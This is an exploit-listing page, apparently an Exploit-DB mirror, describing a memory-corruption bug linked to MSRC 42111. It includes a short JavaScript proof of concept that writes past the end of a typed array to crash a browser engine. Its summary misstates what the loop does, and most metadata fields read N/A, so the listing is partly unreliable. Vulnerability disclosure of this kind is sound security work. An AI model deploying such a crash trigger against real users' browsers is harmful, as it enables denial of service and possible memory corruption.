header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
7.5
CVSS
HIGH
Memory Corruption
119
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: MSRC 42111
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Issue 1429

This issue is similar to the issue 1429 (MSRC 42111). It might need to refresh the page several times to observe a crash. The PoC code creates a Uint32Array of 1000 elements and then iterates over it, setting each element to 0x1234. This can lead to a memory corruption.

Mitigation:

Ensure that the code is properly validated and sanitized.
Source

Exploit-DB raw data:

/*
It seems that this issue is similar to the  issue 1429  (MSRC 42111). It might need to refresh the page several times to observe a crash.

PoC:
*/

let arr = new Uint32Array(1000);
for (let i = 0; i < 0x1000000; i++) {
    for (let j = 0; j < 1; j++) {
        i--;
        i++;
    }

    arr[i] = 0x1234;
}

Navigation

Suggest Exploit

Services By CQR